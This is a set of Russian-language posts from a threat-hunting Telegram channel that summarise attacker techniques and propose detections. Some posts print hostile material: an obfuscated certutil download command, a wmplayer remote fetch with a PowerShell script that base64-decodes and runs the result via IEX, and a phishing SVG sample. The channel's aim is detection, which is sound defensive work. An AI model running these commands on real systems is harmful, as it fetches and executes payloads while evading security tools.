Собрал несколько статей, раскрывающих использование Python в наступательных операциях 🧑💻
🔤 https://trustedsec.com/blog/operating-inside-the-interpreted-offensive-python?utm_source=tg&utm_medium=hacker&utm_campaign=270125
🔤 https://thehackernews.com/2025/01/python-based-malware-powers-ransomhub.html
🔤 https://habr.com/ru/companies/slurm/articles/746622/
🔤 https://habr.com/ru/companies/numdes/articles/581374/
🔤 https://pythonassets.com/posts/create-executable-file-with-pyinstaller-cx_freeze-py2exe/
🔤 https://www.guidepointsecurity.com/blog/ransomhub-affiliate-leverage-python-based-backdoor/
🔤 https://xakep.ru/2022/10/27/python-pyramid/
🔤 https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html
#ttp@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
TrustedSec
Operating Inside the Interpreted: Offensive Python
Discover how to use Python for malicious purposes on Windows, leveraging its ease of installation and existing tradecraft to evade detection and deploy…
👍5🍌3🔥2
Всем привет!) 👋
В рядах
Проект агрегирует утилиты для построения туннелей из изолированных и защищенных сетей🧑💻
#ttp@detectioneasy
В рядах
living on the yet another пополнение, lottunnelsПроект агрегирует утилиты для построения туннелей из изолированных и защищенных сетей
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - LOTTunnels/LOTTunnels.github.io
Contribute to LOTTunnels/LOTTunnels.github.io development by creating an account on GitHub.
🔥7👍3🍌3
Detection is easy
В дополнение к lottunnels - LOLRMM #ttp@detectioneasy
Кайф, что проект не только собирает утилиты RMM, но и подготовил жирный набор Sigma-правил 🔭
#detection@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
LOLRMM/detections/sigma at main · magicsword-io/LOLRMM
LotL RMM. Contribute to magicsword-io/LOLRMM development by creating an account on GitHub.
🔥3👏3😁1
Detection is easy
Cisco Talos выпустили обзор одной из вредоносных кампаний. 🔤 Атака начинается с фишинга, письмо содержит *.tgz архив с вредоносом внутри 🔤 Когда пользователь открывает архив ему нужно запустить исполняемый файл .NET loader 🔤 Loader, загружает PureCrypter…
Ранее обсуждали использование вредоносами 🦠 Tor и утилит для туннелирования, на Хабре рассказали про альтернативные оверлейные сети, их нужно обнаруживать и блокировать)
#ttp@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Detection is easy
Всем привет!) 👋
В рядах living on the yet another пополнение, lottunnels
Проект агрегирует утилиты для построения туннелей из изолированных и защищенных сетей 🧑💻
#ttp@detectioneasy
В рядах living on the yet another пополнение, lottunnels
Проект агрегирует утилиты для построения туннелей из изолированных и защищенных сетей 🧑💻
#ttp@detectioneasy
👍4❤1😁1
У Unit 42 был замечательный отчет 😎 Начало обещает что-то интересное
🔤 эксфильтрация вывода команд через утилиту ping. Домен, который пингуют формируется так,
🔤 использование
🔤
🔤
🔤 для обхода UAC использовали
🔤 в качестве C2, кроме Cobalt Strike, группировка использовала
#ttp@detectioneasy
This activity cluster used rare tools and techniques including the technique we call Hex Staging, in which the attackers deliver payloads in chunks. Their activity also includes exfiltration over DNS using ping, and abusing the SQLcmdutility for data theft.
tasklist.exe.outputformatstring.dnslog.pw , на месте tasklist.exe может быть другое имя. Каждый новый домен будет резолвится на dns-серверах, которые под контролем злоумышленников dnslog.pw (не забудьте сделать ретро по свои логам)invoke-webrequest и certutil DLL sideloading, для обхода обнаружения дропается уязвимый легитимный Acrobat.exe и рядышком незаметная Acrobat.DLL которая расшифрует и запустит PlugXHex Staging, суть метода запись файла по кускам в hex, а не полностью, для обхода обнаружения. Далее кодировка меняется с помощью certutil SspiUacBypass (почитать), BadPotato, RasmanPotatoSupershell#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Unit 42
CL-STA-0048: An Espionage Operation Against High-Value Targets in South Asia
A Chinese-linked espionage campaign targeted entities in South Asia using rare techniques like DNS exfiltration, with the aim to steal sensitive data. A Chinese-linked espionage campaign targeted entities in South Asia using rare techniques like DNS exfiltration…
🔥5👍2❤1
Всем привет!) ⚠️
Отличные новости😅 в инструментах SysInternals обнаружили уязвимости DLL Hijacking
Некоторые из уязвимых утилит Sysmon, Process Explorer, Autoruns, Bginfo и другие🧑💻
Полный список🤔
#ttp@detectioneasy
Отличные новости
Некоторые из уязвимых утилит Sysmon, Process Explorer, Autoruns, Bginfo и другие
Полный список
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Raik Schneider - Foto, Video und IT-Security
🚨 Disclosure: Zero-Day-Sicherheitslücken in den Microsoft Sysinternals-Tools enthüllt 🚨 - Raik Schneider - Foto, Video und IT-Security
Ich habe kritische Schwachstellen in nahezu allen Sysinternals-Tools identifiziert, verifiziert und in einem Video die Hintergründe und den Angriff vorgestellt. Eine Zusammenfassung zur Schwachstelle sowie den Link zum Video findet ihr hier in diesem Blogpost.…
🔥4👍2😁1
У MITRE есть фреймфорк ATLAS (Adversarial Threat Landscape for Artificial-Intelligence Systems) - это база знаний о тактиках, техниках и процедурах атакующих в отношении систем Al, основанная на реальных наблюдениях за атаками и реалистичными демонстрациями.
Матрица имеет следующие тактики:
🔤 Reconnaissance
🔤 Resource Development
🔤 Initial Access
🔤 ML Model Access
🔤 Execution
🔤 Persistence
🔤 Privilege Escalation
🔤 Defense Evasion
🔤 Credential Access
🔤 Discovery
🔤 Collection
🔤 ML Attack Staging
🔤 Exfiltration
🔤 Impact
#ttp@detectioneasy
Матрица имеет следующие тактики:
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7❤1😁1
Всем привет! 👋
Исчерпывающие руководство по способам закрепления в Linux, но отсутствуют актуальные техники, такие как udev
#ttp@detectioneasy
Исчерпывающие руководство по способам закрепления в Linux, но отсутствуют актуальные техники, такие как udev
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
pepe berba
Hunting for Persistence in Linux (Part 1): Auditd, Sysmon, Osquery (and Webshells)
An introduction to monitoring and logging in linux to look for persistence.
👍5🤔3😁1
Знали ли Вы о применении svg в фишинговых кампаниях 🧑💻 ?)
Sophos поделились накопленной информацией о применении такой техники.
Пример вредоносного файла с MalwareBazaar🦠 который предлагает кликнуть для продолжения авторизации
Использование html-тегов выглядит безобидно всравнении с возможностями внедрения JS, который используется для автоматического перехода на вредоносный ресурс, даже если пользователь не нажал на ссылку.
Злоумышленники позаботились о защите своих ресурсов от песочниц и прикрутили к ним CAPTCHA от CloudFlare)
Нужно ли добавлять в ТЗ к песочницам возможность решения капчи для анализа ссылок??🧐 )
#ttp@detectioneasy
Sophos поделились накопленной информацией о применении такой техники.
Пример вредоносного файла с MalwareBazaar
<svg height="30" width="200" xmlns="http://www.w3.org/2000/svg">
<a href="https://subtettiarrydivisions.s3.us-west-2.amazonaws.com/dzfhoerszgfiuwkeadbfwuoeudjiwsl.html" target="_blank">
<text x="5" y="15" fill="blue">Yzesati Click To Sign </text>
</a>
</svg>
Использование html-тегов выглядит безобидно всравнении с возможностями внедрения JS, который используется для автоматического перехода на вредоносный ресурс, даже если пользователь не нажал на ссылку.
Злоумышленники позаботились о защите своих ресурсов от песочниц и прикрутили к ним CAPTCHA от CloudFlare)
Нужно ли добавлять в ТЗ к песочницам возможность решения капчи для анализа ссылок??
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Sophos News
Scalable Vector Graphics files pose a novel phishing threat
The SVG file format can harbor malicious HTML, scripts, and malware
👍4🔥4🍌4
Всем привет 👋
В отчете про Kimsuky🧑💻 интересно, что при отсутствии на взломанном хосте службы удаленных рабочих столов, атакующие используют rdpwrap
Что же делать?))🔭
🔤 Создание файла 🔤 метаданные файла совпадают с
🔤 изменение ключа реестра
Можем похантить, если значение этого ключа не
#ttp@detectioneasy
В отчете про Kimsuky
Что же делать?))
RDPWInst.exe, rdpwrap.ini, rdpwrap.txt, rdpwrap.dll
Product: RDP Host Support или Company: Stas'M Corp.HKLM\System\CurrentControlSet\services\TermService\Parameters\ServiceDll\ Можем похантить, если значение этого ключа не
System32\termsrv.dll, стоит подзадуматься#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
ASEC
Persistent Threats from the Kimsuky Group Using RDP Wrapper - ASEC
Persistent Threats from the Kimsuky Group Using RDP Wrapper ASEC
🔥5👍4🍌3
Большой обзор про использование cloudflared для туннелирования трафика 🧑💻
https://labs.jumpsec.com/bring-your-own-trusted-binary-byotb-bsides-edition/
#ttp&@detectioneasy
https://labs.jumpsec.com/bring-your-own-trusted-binary-byotb-bsides-edition/
#ttp&@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
JUMPSEC Labs
Bring Your Own Trusted Binary (BYOTB) – BSides Edition
Recently, I presented a talk on the main stage at BSides London 2024 and the topic I chose to present on was in regards to bringing trusted binaries to a system and using them in an adversarial fashion.
👍4🔥4❤2🍌1
Как всегда супер отчет от thedfirreport
Почему-то все еще работают закрепы в автозагрузке и планировщике задач🧑💻
#ttp@detectioneasy
#detection@detectioneasy
Почему-то все еще работают закрепы в автозагрузке и планировщике задач
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
The DFIR Report
Cobalt Strike and a Pair of SOCKS Lead to LockBit Ransomware
Key Takeaways This intrusion began with the download and execution of a Cobalt Strike beacon that impersonated a Windows Media Configuration Utility. The threat actor used Rclone to exfiltrate data…
🔥3👍2🍌1
elastic-siem-buyers-guide-for-the-modern-soc.pdf
3.3 MB
World of detection выбирает SIEM, и наткнулась на руководство от Elastic по выбору SIEM для современного SOC Как и во всех документах по построению SOC сердцем являются - люди
Какие функции должны быть у современного SIEM:
В документе собрали чеклист из 25 пунктов по внедрению SIEM, в нем рассмотрены такие направления, как:
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥3🥰1🍌1
Привет!) 👋
Все слышали про PsExec и многие с ним работали)
Он позволяет нам локально повысить привелегии до SYSTEM😇 или другого пользователя, выполнять команды удаленно. Администраторы держат его под рукой, чтобы в случае нештатной ситуации быстро настроить сломавшийся хост)
Выглядит удобно, еще и подписан сертификатом Microsoft.
Получается идеальный инструмент для🧑💻 Хакеры и пентестеры часто используют PsExec или его аналоги
Уже не первый разбор в котором описана работа PsExec.
Вспомним основные этапы его работы:
🔤 загрузка двоичного файла в ADMIN$
🔤 удаленное создание службы
🔤 удаленный запуск службы
🔤 проверка, что служба запущена
В статье упоминали про утилиту psexecsvc.py. Основное отличие от других реализаций - использование подписанного файла для службы PsExecSvc, что может позволить обойти сигнатурное обнаружение
#ttp@detectioneasy
#detection@detectioneasy
Все слышали про PsExec и многие с ним работали)
Он позволяет нам локально повысить привелегии до SYSTEM
Выглядит удобно, еще и подписан сертификатом Microsoft.
Получается идеальный инструмент для
Lateral Movement psexec.py для продвижения по сети. Что для красных удобно - для синих шумно🤔
Уже не первый разбор в котором описана работа PsExec.
Вспомним основные этапы его работы:
В статье упоминали про утилиту psexecsvc.py. Основное отличие от других реализаций - использование подписанного файла для службы PsExecSvc, что может позволить обойти сигнатурное обнаружение
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Sensepost
SensePost | Psexec’ing the right way and why zero trust is mandatory
Leaders in Information Security
👍5🔥4❤2🍌1
Всем привет!) 👋
Пытались ли Вы скачать нагрузку с помощью certutil? Наверняка AV/EDR заблокировал Вашу попытку🤚
Однако, если обфусцировать аргументы команд, попытка может стать успешной👍
Для cmd/bat появился онлайн-ресурс
Интересно, сможем ли мы обнаружить, что запускалось на самом деле?)🔭
#ttp@detectioneasy
Пытались ли Вы скачать нагрузку с помощью certutil? Наверняка AV/EDR заблокировал Вашу попытку
Однако, если обфусцировать аргументы команд, попытка может стать успешной
Для cmd/bat появился онлайн-ресурс
https://argfuscator.net/, который обфусцирует аргументы. Правила обфускации определены в репозитории проекта Интересно, сможем ли мы обнаружить, что запускалось на самом деле?)
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
ArgFuscator.net/models/windows at main · wietze/ArgFuscator.net
ArgFuscator.net is an open-source, stand-alone web application that helps generate obfuscated command lines for common system-native executables. - wietze/ArgFuscator.net
👍4🔥4😁3🍌1
Специалисты ЛК поделились обзором по применению Mythic C2
Все как обычно, атакующие присылают письмо с архивом✉️ внутри которого архив, внутри которого LNK, ps1 и много decoy-файлов) Да-да вот такие матрешки собираются 🪆
Дальше происходит выполнение ряда скриптов)
Интерес для TH может представлять использование
Можно познакомиться с Sigma-правилом
#ttp@detectioneasy
#detection@detectioneasy
Все как обычно, атакующие присылают письмо с архивом
Дальше происходит выполнение ряда скриптов)
Интерес для TH может представлять использование
conhost.exe в качестве родительского процесса
conhost --headless C:\Users\Public\Libraries\Passport\19.jpg
Можно познакомиться с Sigma-правилом
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Securelist
Агенты для Mythic, Merlin и Loki, атакуют российские компании
Merlin, малоизвестный агент для Mythic, атакует российские компании в рамках одной кампании с Loki. Мы назвали группу, стоящую за этой активностью, Mythic Likho.
🔥3👍2👏2
Всем привет!)
В конце 2024 года, один из исследователей обнаружил возможность загружать файлы на хост с помощью Windows Medial Player -
Для запуска нужно выполнить
файл сохраняется в INetCache, для его поиска и запуска скрипт от автора ниже)
Попробуем обнаружить?)🔭
#ttp@detectioneasy
#detection@detectioneasy
В конце 2024 года, один из исследователей обнаружил возможность загружать файлы на хост с помощью Windows Medial Player -
wmplayer.exeДля запуска нужно выполнить
& "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" "https://pampuna.nl/example/whoami.wma"
файл сохраняется в INetCache, для его поиска и запуска скрипт от автора ниже)
Get-ChildItem -Recurse -Force -ErrorAction SilentlyContinue -filter "whoami*.dat" "~\AppData\Local" | ForEach-Object {
Write-Host "Found: $($_.FullName)"
cd $_.DirectoryName
$data = [System.IO.File]::ReadAllBytes($_.FullName)
$base64 = ([System.Text.Encoding]::UTF8.GetString($data) -replace '\b\w{1,5}\b', '') -replace '[^A-Za-z0-9+/=]', ''
Write-Host $base64
$converted = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($base64))
IEX($converted)
}
Попробуем обнаружить?)
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
pampuna.nl
Crafted File Download Using Wmplayer
🔥4👍2🤔2
Detection is easy
Всем привет!) 👋 Пытались ли Вы скачать нагрузку с помощью certutil? Наверняка AV/EDR заблокировал Вашу попытку 🤚 Однако, если обфусцировать аргументы команд, попытка может стать успешной 👍 Для cmd/bat появился онлайн-ресурс https://argfuscator.net/, который…
Продолжим тему с обфускацией аргументов и команд в Windows
Есть два примера из событий запуска процессов, первый не обфусцированный:
и второй обфусцированный:
Если мы второй пример приведем к lowercase, то это нам особо не поможет, т.к. мы можем зафиксировать только факт использования бинаря)
Но кто в здоровой инфраструктуре будет использовать, такое количество непонятных символов, вставлять кавычки по середине слов?🧑💻
Мы можем построить обнаружение на проверке регулярным выражением использования кавычек:
В нормальной ситуации кавычки используются в начале и конце строки, наример
#ttp@detectioneasy
#detection@detectioneasy
Есть два примера из событий запуска процессов, первый не обфусцированный:
certutil.exe -urlcache -split -f https://www.example.org/file.exe file.exe
и второй обфусцированный:
CeRtutIL.EXe -uʳLᶜᵃ?ᶜH?E? /ˢᵖˡ??It??ԫ -"F" htt"ps:/"/www.e"xa"m"p"le.o"r"g"/fi"le.e"xe" fi"L"E.exe
Если мы второй пример приведем к lowercase, то это нам особо не поможет, т.к. мы можем зафиксировать только факт использования бинаря)
Но кто в здоровой инфраструктуре будет использовать, такое количество непонятных символов, вставлять кавычки по середине слов?
Мы можем построить обнаружение на проверке регулярным выражением использования кавычек:
ProviderName="Microsoft-Windows-Sysmon" and EventId = 1 and CommandLine = "[\w\d\/\:]+\"+[\w\d\/\:]+"
В нормальной ситуации кавычки используются в начале и конце строки, наример
certutil "https://qwer.qwer", а при обфускации кавычки вставляются в аргументы и их значения, для деления слова на неосмысленные группы#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
1👏4👍2🔥2
DLL Sideload для встроенной утилиты
Можем обнаружить создание необходимой DLL:
Вообще забавно, кто-то перестраховался с тремя System32 😃
#ttp@detectioneasy
#detection@detectioneasy
cleanmgr.exeМожем обнаружить создание необходимой DLL:
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName endswith "\System32\System32\System32\dokannp1.dll"
Вообще забавно, кто-то перестраховался с тремя System32 😃
#ttp@detectioneasy
#detection@detectioneasy
👍3😁3🔥2
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2025-21420: Windows LPE (cleanmgr.exe DLL sideload)
PoC: https://github.com/Network-Sec/CVE-2025-21420-PoC
P.S. LPE такая себе конечно, но sideload отметим)
#lpe #git #exploit #pentest #redteam
PoC: https://github.com/Network-Sec/CVE-2025-21420-PoC
P.S. LPE такая себе конечно, но sideload отметим)
#lpe #git #exploit #pentest #redteam
👍4🔥1🤔1